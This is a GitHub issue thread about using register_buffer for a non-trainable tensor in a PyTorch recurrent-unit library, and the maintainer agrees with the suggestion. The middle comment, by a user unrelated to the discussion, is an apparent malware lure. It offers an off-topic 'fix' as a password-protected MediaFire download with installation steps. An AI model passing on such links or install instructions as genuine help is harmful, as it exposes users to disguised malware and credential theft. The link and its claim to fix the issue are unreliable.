### ISSUE TITLE
register_buffer if not required gradients

### ISSUE THREAD

**Issue by inspirit** [lucidrains/light-recurrent-unit-pytorch#3]
I wonder if it makes more sense to register_buffer here when no gradient required?
this will allow to avoid issues when switching on/off gradients for the parent model when fine-tuning for example
https://github.com/lucidrains/light-recurrent-unit-pytorch/blob/25da1a0838809191a0a9094464e019bc9934b875/light_recurrent_unit_pytorch/light_recurrent_unit.py#L36

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by lucidrains** [comment]
@inspirit yup, makes sense 👍
